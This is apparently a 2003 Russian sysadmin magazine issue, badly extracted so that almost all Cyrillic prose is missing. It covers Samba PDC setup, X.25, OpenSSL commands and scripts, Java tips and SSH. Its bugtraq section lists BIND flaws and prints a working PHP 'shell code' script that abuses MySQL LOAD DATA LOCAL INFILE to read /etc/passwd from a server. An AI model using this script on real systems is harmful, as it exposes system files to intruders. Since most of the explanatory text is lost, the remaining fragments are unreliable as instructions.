Вы находитесь на странице: 1из 98

1(2) 2003

:
,

OpenSSL
SAMBA PDC

!

,
.

. ,
.
,

, . , -,
, . , , . , . - ,
, .
,
, . - .
,

PDC
( )
Windows SAMBA 2.2.5
:
SAMB PDC.

gus@horizont.com.ua

34

.25
, .25.

40

f3x@land.ru

12
OpenSSL



. .
.

CEBKA@smtp.ru

16
...

,

.
DNS?..

48

f3x@land.ru

!
.
. ?

*nix- ssh-, .
ssh,
host-based ,
.

wurger@yandex.ru

DNS

28

apotemkin@itinfo.spb.ru

CEBKA@smtp.ru

50

CEBKA@smtp.ru

,
,
. .

54

,
siteMETA
, ,
, .
SiteMET - .

info@meta.ua

60

Jav: ( II)
ClassLoader -


.
Linux?

hymnazix@aviel.ru

88

Linux !
Linux , . , Windows, Linux. Linux Windows,
.

daniel@siams.com

64

ColdFusion,
, -

92

andy_shev@mail.ru

apm@poptsov.ru

78

4, 15, 95

, , , , , , . ?
.

27, 58

FAQ JA
VA
JAV

BUGTRAQ

82
1(2), 2003

ubob@mail.ru

FAQ JAVA
:


. , Math.PI+""
3.141592653589793.
. ?
:
java.text.DecimalFormat.
,
:
public static String toS(double v, int d) {
return toS(v,d,false);
}
public static String toS(double v, int d,
boolean exponentForm)
// exponentForm
//
{
StringBuffer ptn= new StringBuffer("0");
if (d>0) {
ptn.append(".");
for (; d>0; d) ptn.append("0");
}
if (exponentForm) ptn.append("E0");
DecimalFormat f= new DecimalFormat(
ptn.toString());
return f.format(v).replace(",",.);
// replace
// - , -
// ,
}

:
Java- ( Java)?

:
Sun Java , Java-
Java C, ++
Pascal. ?
:
, !
, , , .
Java
native- ( ).
Just-In-Time HotSpot
, Java-,
,
C
10-100 Java.
- . .
. 2 a b (short) 20000.

a: a[k]= a[k]<b[k]? a[k]: b[k].
Java
native- C. ,
. Java :
for (;
if
if
if
if
}

aofs<aofsmax; aofs+=4,bofs+=4) {
(a[aofs]>b[bofs]) a[aofs]=b[bofs];
(a[aofs+1]>b[bofs+1]) a[aofs+1]=b[bofs+1];
(a[aofs+2]>b[bofs+2]) a[aofs+2]=b[bofs+2];
(a[aofs+3]>b[bofs+3]) a[aofs+3]=b[bofs+3];

:
Runtime.getRuntime().addShutdownHook(new Thread() {
public void run() {
;
}
});

,
() ,
deleteOnExit() File.
!
Sun, Java, ,
Java-, finalize,
addShutdownHook deleteOnExit. , , ,
.

Pentium-III
800 MHz 256 Kb :
, Java
11.5 , C++ 6
. ( Sun Java SDK
1.4.1 Microsoft C++ Visual Studio
6.0, Windows 2000.) C++ MMX/SSE, 1.4 8 Java.
, Java, C : 25 Java, 19 12
MMX/SSE. (
, ,
.)

PDC
( )

WINDOWS

SAMBA 2.2.5

OpenSource, -
. , , ,
, ,
, . . ,
OpenSource, (,
). ( ) .
. , Samba.


Samba , , ,
UNIX, , Windows-.
, SAMBA UNIX-
SMB CIFS Microsoft,
,
MS Windows. ,
Samba Microsoft Windows NT 4.0 Server.
,
, ;
, Samba PDC.


, ASPLinux 7.2. , RedHat 7.2
, .
ASPLinux, ,
RedHat. , -
,
ASPLinux . , - , .

SAMBA-2.2.5.rpm RedHat 7.2 samba.org.


:
>

rpm -ivh samba-2.2.5.rpm

(
), , ,
, . , . ,
! man- man;
! /usr/sbin;
! /etc/samba;
! SWAT (
SAMBA Web-).
, ,
, Samba
. :
! samba-2.2.5.tar.gz;
! :
> tar xvzf samba-2.2.5.tar.gz

! :
> cd samba-2.2.5/source

! ( !):

1(2), 2003

> ./configure prefix=/usr \


>
bindir=/usr/bin \
>
sbindir=/usr/sbin \
>
libexecdir=/usr/libexec \
>
datadir=/usr/share/samba \
>
sysconfigdir=/etc/samba \
>
with-msdfs \
>
with-configdir=/etc/samba \
>
with-winbind

: , /usr/bin /usr/sbin
, ,
/etc/samba. ,
Samba /usr/local/samba.
, /lib, .
, /etc, /usr/local/etc
( FreeBSD). : with-msdf, Microsoft Distributed File System, , .
> make

> make install

: . - ,
make! ,
:
2.2.5 , 2.2.4

, ,
configure ,
make-. .

, Samba , . rpm,

/etc/samba. , . ,
.
. Samba
smb.conf. : cd /etc/samba
cp smb.conf smb.conf.bak.
smb.conf ,
. .
: [global],
, ,
shares, . , , [homes], : ,
.
, ;
- ,
[global].
, .


,
, [global],
.
, , ,
. :
#
#
#
#

( OS Level, )
. , NetBIOS- , . domain master, ,
SAMBA .
:

/etc/samba/smb.conf
SAMBA configuration file
Created by GUS 04.08.2002
Last updated : 05.08.2002 by GUS

; Security settings
security = user
encrypt passwords = yes
domain logons = yes
hosts allow = 127.0.0.1 10.150.150.

[global]
; Basic setting for our server
; NetBIOS name for our server
netbios name = DREAM
; workgroup name, here - DOMAIN NAME
workgroup = DREAMHOUSE
; server description string
server string = DREAMHOUSE Primary Domain Controller running
Samba %v

! security = user user

! netbios name = DREAM -

Windows- DREAM. , :
,
SAMBA DNS- . , SAMBA
;
workgroup = DREAMHOUSE , , , , , !
server string = DREAMHOUSE Primary Domain Controller
running Samba %v , Windows-. , PDC , Samba %v, %v SAMBA.

, , SAMBA ,
,
.
smb.conf :
; PDC settings
os level = 64
domain master = yes
preffered master = yes
local master = yes

:
- ,
,
local master
browser, , local master browser
: ,
master browser. 4 -

!
!

SAMBA, , , SAMBA-PDC-FAQ,
SERVER DOMAIN, SHARE,
.
SAMBA, ;
encrypt passwords = yes
, ..
, -
NT-
Windows ( NT4.0+SP3), Windows Me.
,
Microsoft Samba;
domain logons = yes ;
hosts allow = 127.0.0.1 10.150.150.
(, , ),
SAMBA-. -, 127.0.0.1 (localhost) , FAQ SAMBA
, .
:
; Various logon settings

; path - where to store user profiles


logon path = \\%N\profiles\%u
; home directory - where it is, and where it should be
mounted
logon drive = Z:
logon home = \\homes\%u
; default domain logon script - generic script for all users
; NOTE : this is relative !!! DOS !!! path to the [netlogon]
share
logon script = start.cmd

:
! logon path = \\%N\profiles\%u ;
! logon drive = Z: ,
, logon home;
! logon home = \\homes\%u , ..
;


! logon script = start.cmd ,
.
: -,

NETLOGON
. -,
, , , .. *.BAT-,
NT *.CMD-.
, [global] ,
, shares ,
, .
:
; Netlogon share
[netlogon]
comment = Network logon service
path = /home/netlogon
browseable = No

[netlogon] .
. .
:
! comment = Network logon service
, Windows-;
! path = /home/netlogon ;
! browseable = No , ,
.
,

:
read only = yes
write list = admin

, read only = yes , write list = admin, .


homes:
; Users home directories
[homes]
comment = Home Directories
valid users = %S
read only = No
create mask = 0664
directory mask = 0775
browseable = No

,
, , ,
.

1(2), 2003

! comment = Home Directories

!
!
!

,
Windows;
valid users = %S
;
read only = No ,
;
create mask = 0664 directory mask = 0775 .

, ;
browseable = No , (,
).
; Users profiles
[profiles]
path = /home/samba/profiles
create mask = 0600
directory mask = 0700
browseable = No

, . .
:
! path = /home/samba/profiles ;
! create mask = 0600 directory mask = 0700
, , :
0600 rwx-xxx-xxx, ..
, ;
0700 rwx-xxx-xxx , .
! browseable = No
.
.
: , Windows NT Windows 9x - , , ,
. , Windows 9x
, .
:
; Printers
[printers]
comment = All Printers
path = /var/spool/samba
printable = Yes
browseable = No

. ,
- Windows SAMBA-


. , .
, .
:
! comment = All Printers ;
! path = /var/spool/samba ;
! printable = Yes ;
! browseable = No .
.
. .




(UNIX-!), ,
(, , Windows NT, SAMBA, UNIX
, ). GID
,
,
ASPLinux, 200 201.
admins:
> groupadd -g 200 admins

machines:
> groupadd -g 201 machines

RedHat Linux (
ASPLinux) :
> group -g 200 admins
> group -g 201 machines

:
> mkdir -m 0775 /home/netlogon
> chown root.admins /home/netlogon

, , root
admins, , ,
.
> mkdir /home/samba /home/samba/profiles
> chown 1757 /home/samba/profiles

/home/samba/profiles,
, ,
-

10




account, , .

. . :
! UNIX;
! SAMB.
!
: gus
:
>
>
>
>
>

useradd gus
passwd gus
New password:
Retype new password:
passwd: all authentication tokens updated successfuly

SAMB:
>
>
>
>

smbpasswd -a gus
New SMB password:
Retype new SMB password:
Added user gus

: , SAMBA,
, . :
> smbpasswd -e gus

,
Windows-, : SAMBA- , UNIX
. ? , .


SAMBA UNIX
,
[global] :
; UNIX password syncing
unix password sync = Yes
passwd program = /usr/bin/passwd %u
passwd
chat
=
*New*UNIX*password*
%n\n
*Retype*new*UNIX*password* %n\n *Enter*new*UNIX*password* %n\n
*Retype*new*UNIX*password*
%n\n
*passwd:
*all*authentication*tokens*updated*successfully*

passwd chat: ,
, !


: ; . :
, SAMB, ASPLinux .

! ;
! passwd -l;
! ;
! ( $);
! .

, , . RedHat 7.2 7.3,


ASPLinux 7.3 .
: Samba 2.2.1-2.2.5
root
. , SAMB
root. SAMB
. root UNIX SAMBA . FAQ SAMB, ,
, , .
! . SAMB.
SAMB smbd
nmbd. , ,
; NetBIOS, :

RedHat 7.2
:
>/usr/sbin/useradd -g machines -d /dev/null -c machine
nickname -s /bin/false machine_name$
> passwd -l machine_name$
> Changing password for user machine_name$
> Locking password for user machine_name$

machine_name ,
, , - .
ASPLinux . :
> /usr/sbin/useradd -g machines -d /dev/null -c machine
nickname -s /bin/false machine_name
> passwd -l machine_name
> Changing password for user machine_name
> Locking password for user machine_name

> vipw

, ( ), $.
-
UNIX VI. :
>smbpasswd -a -m machine_name

machine_name NetBIOS- ; , ,
SAMB , -m.
! ,
! ? ,
SAMB, ..
. ,
:
NetBIOS-. .

2

RedHat 7.2 [global]
smb.conf :
add user script = /usr/sbin/useradd -d /dev/null -g machines
-s /bin/false -M %u

ASPLinux 7.2 , - ,
, (-) :

1(2), 2003

> nmbd -D
> smbd -D

.
? .
, /etc/rc.d/rc.local,
ala FreeBSD. ,
-, . .

, . , ( ACL), , , winbind .
Microsoft MS DFS. . . , ,
,
3-5 , .
P. S. 20 2002 SAMBA
2.2.7, :

. , , ,
, . .

11

.25

, .25,
, . ,
.25 .25
,

.
IT 1974

.
-

12

,
. ,


.

,
, .
,
.25, . .25
.75.

.25 , :
! PAD (Packet
Assembler Disassembler), -

- , , - ();


(connectionless),

;




IP
().

.25 (Switches, S),


(),


.
,
, .
-
PAD.
.

. PAD

.

. PAD , .25. PAD
. RS-232C. PAD
8, 16 24
.
PAD, .3, :
! , ;

1(2), 2003

! !


;

.25 ;
,
-
;

,
,
.


.25. PAD,
.25 .

,
PAD . PAD .25
,

RS-232.
C .28 ,
PAD.
,
. PAD :
.


,
.25, PAD:
, - , PAD,

.
, .3 .28 , telnet TCP/IP.

PAD , -

.

.25 .25 ,
.25.
.29,

PAD
, . , .25 ,
PAD ,
.25.

.25
.25 - , ( )
.
.25 16
.
.121 IT .
.25
.25,
.121.
.121 (
IDN International Data Numbers) , 14 . IDN (Data
Network Identification Code, DNIC). C
DNIC :
(3 ) ,
,
.25 . ,
10
.25.
10 , , .
, 1995
250, 1995
251. (National
Terminal Number, NTN).
DTE .25.

13


.25

ISO
7498.
ISO 7498 .25
.121
, 36 ( ) 37 (
).

, , ISDN, .25,
.

.25
.25 3
:
! .25
.21 bis DSI/CSU, , ,
;
! HDLC,

.

: LAP LAP-B;
! .25/3

.

,
.
,

.
LAP-B. , ,
, . LAP-B DTE
.
,

14

LAP-B


. LA-B
LLC2, . LAP-B
. (
8
),
( 128 ).
.25/3 ( , ) 14 , LAP-B.
LAP-B,
.25/3 ,
.

.
LAP-B Call Request .25.
.25

. ,
,
, . ,
, 251 456,

S1, ,
S1,
251 456, 251 456 12,
251 45. , , , .
.25
TCP/IP. ,


,
, .
, .
,
.25
, ,
. .25 LAP-B

LAP-B, .
. LAP-B , .25,
, LAP-B
.
,
.

.25

. ,
(1200-9600 /),
.

.25 . , ,
.
.

.25 . , .25 -

.

FAQ JAVA
: , , , ?
: System.currentTimeMillis(),
1970 .
: System.currentTimeMillis .
1 . , Windows NT/2000/XP 10 . .

,
.
.
native- C.
Windows
QueryPerformanceCounter QueryPerformance-Frequency,
Intel- 1 . , Intel -

1(2), 2003

:
?
: System.out.println.
\n
, C, C++, Perl
. Java \n, , -: 10
( ). , ,
Macintosh
: ASCII 13 (\r Java).
println. :
public static final String lineSeparator=
System.getProperty("line.separator","\n");

:
System.out.println("1st line"
+lineSeparator+"2nd line");

, , ,
. , , HTTP Web- HTTP-,
13 10, . println ,
print
\r\n .

15



OPENSSL



:
,

.
.
...

,
.
? , ,
. ,
. f(x), x .
,

,
,
.

;
: . , ,
(,
, ,
, , ).
?
:
-
, !
:
, ,

.
,

- ,

1(2), 2003

, .. . .
-
-,
MD SHA. ,
Unix crypt -
. , ,
salt, $1$
8
- MD5,

salt,
, .
salt ,

DES (56 ), salt . 56 ,
56 72057594037927936
(256) . ,
*nix MD5, () 128 ,
!
, ... :

( ).
.

, , , , .
,


. .
,
,
, ,
. , , -
,
. , , , . , ( )
. , . , - ( ,
).
:
(
, )
. -,
.
.
:

, , .
.

( )
(
).
( ,
,

). ,
,
.
,
,
,

.
,
(..
). ,

17


: , ,
,
.
:
,
.
.

,
.
,
.

, . , , :
, ( ). ,
(..
h(M)=h(M)) , , , . , . ,
.
. ,
,
.


.
, , SSH.
(
-

18

), .

, , ,
. ,
, ,
.

. ,
.

.
, .
. ,
. .
,
1024
(
),
2048 (OpenPGP).
128
. .
,
( ).

, .
,
RSA
DSA. . , -

(

DSA
1024 , RSA
, 1024 4096 ). :
! DES (56 );
! 3DES (168 );
! RC* (40 128 );
! Blowfish (128 );
! IDEA (128 ).
,
128 , , 128
, 128 . ,
cbc,
, .. cbc
,
.
,
(SSL secure socket layer),
( , ). ,
, , - , ,
,

, ,

(
:
, ).
, ,
. ,
-



(, , ),
.
(man-inthe-middle),

,
. ,
,
,
. ,
, (, , ).

.
:
!
( ,
, );
!
,
(
, ).
,
, ,

. , ,
, ,
,
.
.
, ,
PGP OpenSSL.

.
, .

1(2), 2003

:
, ,
, ,
, ,
SSH.
:
, ,
,

, (
,
? , - ...).
, :
, .
:
. (3DES, IDEA,
Blowfish).
( ), , .

, (

).
. !
, , -

. (
,
).
,
A B,

, B. , ,
.
/
. ,
.
: , , , 128-
, , , 1024
-
. :
2

.
(

http://
algolist.manual.ru), :


,
( , ).
, , .
OpenSSL
, SSL

. OpenSSL
. API SSL,
.

19


OpenSSL, .
OpenSSL

, , , .
OpenSSL ,
.
openssl list-standartcommands. (list-message-digest-commands)
(list-ciphercommands). ,
OpenSSL :
!
RSA DSA rsa, dsa,
dsaparam;
!
x509, ,
x509,
req, verify, ca, crl, pks12, pks7;
! enc, rsautl;
! dgst;
! S/MIME
s/mime;
! ssl s_client,
s_server.

! openssl rand [-out file] [-rand file]


num: num
:
# openssl rand 5
W~
#

! openssl ciphers [-ssl2] [-ssl3] [-tls1]

openssl speed md5 rsa idea blowfish


des 3des sha1

NAME: NAME, NAME



. :
L OW
(
128 );
MEDIUM (128 );
HIGH
( 128 );
ALL ;
NULL .


(
1000- ), .

(Celeron 366),
:


MEDIUM HIGH, . , :
(, MEDIUM:HIGH).

C ssl:
! openssl speed [___ ]:
, , ; , :

20

openssl.
, ,
, , s/mime, / . ,
. rsa
genrsa:
openssl genrsa [-out file] [-des | des3 | -idea] [-rand file] [bits]

genrsa
bits PEM, des (56
), des3 (3- des 168 ) idea (128
). ( , ,
). -out , stdout, file ( -out
openssl ). -rand
/ ( :),
seed
. -


- /dev/random /dev/
urandom,
, - , /var/log/messages
/boot/vmlinuz, , /dev/random,
*nixe ( -rand

). /dev/random /dev/urandom, , ,
/dev/random 32 768 .rnd
:
dd if=/dev/[u]random of=.rnd count=64

,
-rand EGD ,
, EGD http://
www.lothar.com/tech/crypto/.
-rand ,
,

. 4096- RSA:
# openssl genrsa -out /etc/openssl/
key.pem -des3 -rand /var/log/messages
4096
Generating RSA private key
.....++*...++++++++*
Enter PEM passphrase:
Verify PEM passphrase:


( ).
. rsa openssl rsa.
:
openssl rsa -in filename [-out file]
[-des | -des3 |-idea] [-check] [-pubout]

openssl rsa
,
-in -out.
-pubout,
-out ,
-in -

1(2), 2003

. ,
:
openssl rsa -in /etc/openssl/key.pem
-out /etc/openssl/pubkey.pem -pubout


des3
idea:
openssl rsa -in /etc/openssl/key.pem
-out /etc/openssl/key1.pem -idea

DSA openssl gendsa, genrsa, :


-, DSA
, -,
DSA , paramfile
openssl dsaparam, :
openssl dsaparam [-rand file{s}]
[-C] [-genkey] [-out file] numbits

numbits ,
- dsaparam
stdout DSA
, -genkey ,
, , DSA,
, openssl gendsa, genrsa,

, dsaparam:
# openssl gendsa -out /etc/openssl/
dsakey.pem -rand /boot/vmlinuz -idea
paramfile Enter PEM passphrase: Verify
PEM passphrase:

dsa openssl dsa, ( ) openssl rsa.



DSA:
# openssl dsa -in /etc/openssl/
dsakey.pem -out /etc/openssl/
pubdsakey.pem -pubout


openssl,
.



openssl enc -cipher openssl cipher, cipher
. :
! base-64 ( );
! bf (blowfish 128 );
! des (56 );
! des3 (168 );
! rc4 (128 );
! rc5 (128 );
! rc2 idea (128 ).

-in -out
. (
-k, ,
, ,

). ,
base64,
. openssl
cipher -d ( !), base64 -a.
(),

(salt), ,
,
( ). cbc ,
.
:
! , des3:
# openssl des3 -in file -out
file.des3

! :
# openssl des3 -d -in file.des3 out file

21


! , - sha1 md5).
blowfish(bf),
base64:
# openssl bf -a -in file
-out file.bf64

! base64:
# openssl bf -a -d -in file.bf64
-out file

openssl dgst -hashalg


openssl hashalg (
, ).
openssl hashalg [-c]
file[s].

, -c,
, HEX
.

:
! md2 (128 );
! md4 (128 );
! md5 (128 );
! mdc2 (128 );
! sha (160 );
! sha1 (160 );
! ripemd160 (160 ).

:
md5 :
# openssl md5 -c file MD5(file)=
81:fd:20:ff:db:06:d5:2d:c3:55:b5:7d:3f:37:ac:94

! SHA1 :
# openssl sha1 file SHA1(file)=
13f2b3abd8a7add2f3025d89593a0327a8eb83af

, openssl
dgst

. :
openssl dgst -sign private_key
-out signature -hashalg file[s]

file private_key,
hasalg (-

22

openssl dgst -signature signature


-verify public_key file[s]

file,
public_key
signature.
Verification OK Verification Failure
. , , .
RSA

rsautl.
(
, ,
openssl
dgst). / :
openssl rsautl -in file -out file.cr
-keyin pubkey.pem -pubin -encrypt

file
pubkey.pem.
openssl rsautl -in file.cr -out file
-keyin secretkey.pem -decrypt

file.cr secretkey.pem.


openssl .
Openssl ,
.
.
. ,
( ), , , , ()
. ,
, -

(
, root CA).
, ,
,
( ).


, . , . , , ,
(

). , , http (apache+ssl). , ,

. x509, . Openssl PKCS#10,
Microsoft PKCS#12 ( openssl

), PKCS#7
CA ( )
,
DER (DER-
base64, ) . , DER- ,
base64, DER
,
DER- M$
( .cer),
( PEM DER):


PEM>DER openssl x509 -inform PEM
-in cert.pem -outform DER -out cert.cer
DER>PEM openssl x509 -inform DER
-in cert.cer -outform PEM -out cert.pem


( rsa
dsa).
,
.
, :
(PKCS#7)
. ( ), . ,
, .
: ;
(

); , . :
;

;
; (, CA,
) . ,
.
(
,
,
,
-

1(2), 2003

, ). ,
! :
. ,
openssl ...
openssl req.
,
, ,
.
,
( , # , ):
[ req ]
#
default_bits = 2048
#
default_keyfile = keyfile.pem
# ,
#
distinguished_name = req_distinguished_name
# DN ,
#
prompt = no
#
#
[ req_distinguished_name ]
# DN
C=RU
#
ST=Ivanovskaya
#
L=Gadukino
#
O=Krutie parni
#
OU=Sysopka
#
CN=Your personal certificate
# (,
# )
emailAddress=certificate@gaduk.ru
#

prompt no,
(
),
. , (
). :
=
_default = __
_max =
_min =


:
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
countryName = Country Name (2 letter
code)
countryName_default = RU
countryName_min = 2
countryName_max = 2
localityName = Locality Name (eg, city)
organizationName = Organization Name(
eg, org)
organizationalUnitName
=
Organizational Unit Name (eg, section)
commonName = Common Name (eg, YOUR
name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40

: (, LDAP-),
, /usr/lib/ssl/openssl.cnf, .
openssl req (
,
,
, man req).
openssl req -new -newkey rsa:2048
-keyout rsa_key.pem -config cfg -out
certreq.pem

(-new)
rsa (-newkey
rsa:2048),
-keyout (
DES). -config.
openssl req -x509 -new -key
private_key.pem -config cfg -out
selfcert.pem -days 365

(-new) self-signed (-x509)



CA.
-key -config.
365
(-days), -days .

23



x509 openssl
x509.
CA. (DN, , ,
. .). :
openssl x509 -in cert.pem -noout
-text

.
,

: -fingerprint ( -sha1, -md5
-mdc2), -modulus (
), -serial, -subject, -issuer (, ), email, -startdate, -enddate:

(-req) -in, CA -CA


-CAkey.
(-out)
/usr/lib/ssl/openssl.cnf ( ).

. x509
, .
openssl x509 -in CAcert.pem -addtrust
sslclient -alias myorganization CA \
-out CAtrust.pem

-in
SSL
(sslserver

,
emailProtection

Certificate:
Data:
Version: 3 (0x2)
Serial Number: 0 (0x0)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=RU, ST=region, L=city, O=organization, OU=Sysopka,
CN=CEBKA/Email=CEBKA@smtp.ru
Validity
Not Before: Nov 9 08:51:03 2002 GMT
Not After : Nov 9 08:51:03 2003 GMT
Subject: C=RU, ST=region, L=city, O=organization, OU=Sysopka,

S/MIME).

CA.
self-signed ,
,
.

(

), (
- ).

,
, openssl
.
,
(, ,
),
,
.

CA self-signed :
! :

CN=CEBKA/Email=CEBKA@smtp.ru
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:c6:6b:3b:8e:f8:33:05:a0:dc:e1:38:8f:6a:68:
42:1c:21:33:aa:90:b6:8c:93:14:11:9b:69:94:8a:
3a:0e:42:29:b0:45:14:1b:f0:37:2c:f3:05:db:13:
06:a9:cd:eb:99:31:51:25:86:c8:69:e0:5e:8d:28:
04:8d:1f:08:37:d7:72:39:fe:05:57:61:68:95:bf:
5c:ae:13:f2:05:a1:29:c3:bf:3b:32:ca:1a:ff:22:
53:f9:32:92:78:fe:44:c3:e1:ca:42:5c:5f:d1:49:
da:1c:9f:34:06:04:ee:46:74:8d:11:68:ef:37:e2:
74:1e:d9:46:04:b8:7e:d5:c5
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
3b:42:85:45:08:95:f3:f1:fc:8a:23:88:58:0e:be:e5:9b:56:
1e:c1:ff:39:28:4f:84:19:f8:3e:38:ef:98:34:d6:ee:e0:0a:
de:36:3a:5c:15:88:d7:2a:a4:0a:d5:dc:3e:b2:72:4c:82:57:
b8:fe:52:f6:e2:06:01:38:eb:00:0b:f2:a9:87:be:65:83:19:
13:50:ae:6c:f2:0a:07:14:e6:8c:60:cd:c5:a3:d1:e1:ea:da:
24:c2:6a:06:d5:dc:1c:71:c9:64:fa:9e:c9:ca:97:e2:06:84:
de:4c:69:b8:9a:af:66:14:8d:46:9a:00:53:13:c9:ab:10:b8:
09:c2
openssl x509

24

-req -in clientreq.pem -extfile /usr/lib/ssl/openssl.cnf \


-extensions /usr/lib/ssl/openssl.cnf -CA CAcert.pem -CAkey
serverkey.pem \
-CAcreateserial -out clientcert.pem

openssl genrsa -out CAkey.pem


-rand randfile -des3 4096

! self-signed :
openssl req -new -x509 -key
CAkey.pem -out CAcert.pem -days 365
-config cfg


,
/usr/lib/ssl/misc/CA.pl -newcert,
(
, ) CA .
! , ,
:


#!/bin/bash
dd if=/dev/random of=/tmp/.rnd count=64
RAND="/var/log/messages:/boot/vmlinuz:/tmp/.rnd"
REQ="openssl req"
X509="openssl x509"
RSA="openssl rsa"
GENRSA="openssl genrsa"
O="company"
C="RU"
ST="region"
L="city"
PURPOSES="digitalSignature, keyEncipherment"
CERTTYPE="client, email, objsign"
CA="/etc/openssl/CAcert.pem"
CAkey="/etc/openssl/CAkey.pem"
OUTDIR="/etc/openssl/clientcert/"
CN="client"
BITS=2048
DAYS=365
#
TMP="/tmp/ssl-$$"
mkdir $TMP
if [ ! -d $OUTDIR ];then
mkdir $OUTDIR
fi
pushd $TMP > /dev/null
$GENRSA -rand $RAND -out tmp.key $BITS
#
cat > cfg <<EOT
[ req ]
default_bits
= $BITS
distinguished_name
= req_DN
extensions
= v3_req
[ req_DN ]
countryName
= "1. Country Name
countryName_default
= "$C"
countryName_min
= 2
countryName_max
= 2
stateOrProvinceName
= "2. State or Province Name
stateOrProvinceName_default
= "$ST"
localityName
= "3. Locality Name
localityName_default
= "$L"
0.organizationName
= "4. Organization Name
0.organizationName_default
= "$O"
organizationalUnitName
= "5. Organizational Unit Name
organizationalUnitName_default = "$OU"
commonName
= "6. Common Name
commonName_max
= 64
commonName_default
= "$CN"
emailAddress
= "7. Email Address
emailAddress_max
= 40
emailAddress_default
= ""
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage
= $PURPOSES
nsCertType
= $CERTTYPE
EOT
#
$REQ -new -key tmp.key -config cfg -rand $RAND -out $CN.pem
# : ...
rm -fr /tmp/.rnd
if [ $? -ne 0 ]; then
echo "Failed to make a certificate due to error: $?"
popd > /dev/null
rm -fr $TMP
exit $?
fi
#

(2 letter code)"

(full name)

"

(eg, city)

"

(eg, company)

"

(eg, section)

"

(eg, CA name)

"

openssl pkcs12
-export
-in
client.pem -inkey client-key.pem -out
client.p12 \
-name "Client certificate from our
organization"

(eg, name@FQDN)"

$X509 -req -in $CN.pem -CA $CA -CAkey $CAkey \


-extfile cfg -days $DAYS -out $OUTDIR$CN.pem
chmod 0400 $OUTDIR$CN.pem
chown root:root $OUTDIR$CN.pem
#
$RSA -in tmp.key -des3 -out $OUTDIR$CN-key.pem
chmod 0400 $OUTDIR$CN-key.pem
chown root:root $OUTDIR$CN-key.pem
#
popd > /dev/null
rm -fr $TMP
echo -e "Generation complete, go to $OUTDIR and give to client $CN his certificate
and \
\n private key(for windows users you should use openssl pkcs12 utility)"

1(2), 2003

, (v3_req), ,
,
CA-. CA- basicConstraits
CA:TRUE ( !). nsCertType
(
, , ).
CA-

nsCertType: sslCA, emailCA. ssl


(, )
nsCertType =
server.

(
).
,
(!)
.
Microsoft

PKCS#12.
openssl pkcs12:

:
openssl pkcs12 -in client.p12 -out
client.pem


, CA-,
( -des3, -idea . .).
pem
( !).


pkcs12 (
inkey), base64 .cer (openssl x509 -in
CA.pem -outform DER -out CA.cer).
openssl
s/mime , openssl smime.

25


,
,
MIME- .
:

smime :

openssl smime -sign -in mail.txt


-text -from CEBKA@smtp.ru -to \
user@mail.ru -subject "Signed
message" -signer mycert.pem -inkey \
private_key.pem | sendmail
user@mail.ru

PEM PKCS#7, DER


base64. , -in
(),
-content

-in ( ) (-sign)
(-signer)
(-inkey).
sendmail, MIME- from,
to subject.
openssl smime -verify -in mail.msg
-signer user.pem -out signedtext.txt

-in,
-out,

-signer ( s/mime ,
, s/mime !).
openssl smime -encrypt -in mail.txt
-from CEBKA@smtp.ru -to user@mail.ru \
-subject "Encrypted message"
-des3 user.pem | sendmail
\
user@mail.ru

-in
user.pem, des3.
sendmail.
openssl smime -decrypt -in mail.msg
-recip mycert.pem -inkey private_key.pem
\ -out mail.txt

-in -inkey -recip (


).

smime- from, to subject.

-out sendmail .
, smime:
PKCS#7
( base64).

26

openssl smime -verify -inform [PEM |


DER] -in signature.pem[der] -content \
mail.txt

.
smime , -pk7out (PEM-). PKCS#7
PEM DER
openssl
base64 (

-d).
, ,
SSL .

bugtraq

BIND
ISS X-Force Berkeley Internet Name Domain Server (BIND).
BIND DNS-.
, , DNS- . ,
.
.

BIND SIG Cached RR Overflow Vulnerability


,
DNS-, SIG resource records (RR) ( ), .

, .
, n
DNS-, IP-
. DNS- DNS-, .
n .
DNS- , ,
DNS-.
DNS- BIND 4 BIND 8
: n-request-sent/65535, n-request-sent
, DNS-.
, DNS ( SMTP,
HTTP, LDAP, FTP, SSH).
BIND 4.9.11, 8.2.7, 8.3.4.

BIND OPT DoS


, DNS- , BIND 8, OPT- UDP-.

BIND SIG Expiry Time DoS


, DNS-, BIND-, SIG RR
.
BIND 8 8.3.3,
BIND 4 4.9.10.

DNS BIND
CAIS/RNP (Brazilian Research Network CSIRT) Vagner
Sacramento DIMAp/UFRN ( Rio Grande do
Norte)
Internet Software Consortiums (ISC), Berkeley Internet Name
Domain (BIND),
DNS (DNS Spoofing) 4 8 .
60% DNS- BIND. , BIND
2-
, DNS- .
, DNS-,
IP- .
, . n DNS DNS- (BIND 4 BIND 8), ,
DNS-, -

1(2), 2003


PHP + mySQL ( )
PHP mySQL,
. (mySQL) .
PHP- (viewfile.php):
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd";
// filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser, $dbpasswd);
$sql = array ("USE $dbname",
'CREATE TEMPORARY TABLE '.
($tbl = 'A'.time()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE
$tbl FIELDS ". "TERMINATED BY
'__THIS_NEVER_HAPPENS__' ". "ESCAPED BY'' ".
"LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1");
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die
("FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n");
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "
"; ?>

/etc/passwd.
, .

.

27

...

,
. rsh,
(
) . , telnet-. rsh: , , , ; ,
; ip ,
, . rsh , ,
(
). - ssh.


s (secure), , ssh, ,
, . ssh, . ssh 2.

( ). ssh
(

28


,

backdoors), ssh
OpenSSH, www.openssh.com.
ssh , -, man ssh,
.
, , , . SSH 3
: ip- (),

.
ssh 2:
,

( Preferred
Authentications sshd.conf),
.

,
, , ,
(

).


, ,
(.
OpenSSL),
.
, ssh, ( aes 128 ).
, ssh 1
,
, , . 2
,

sha md5, (
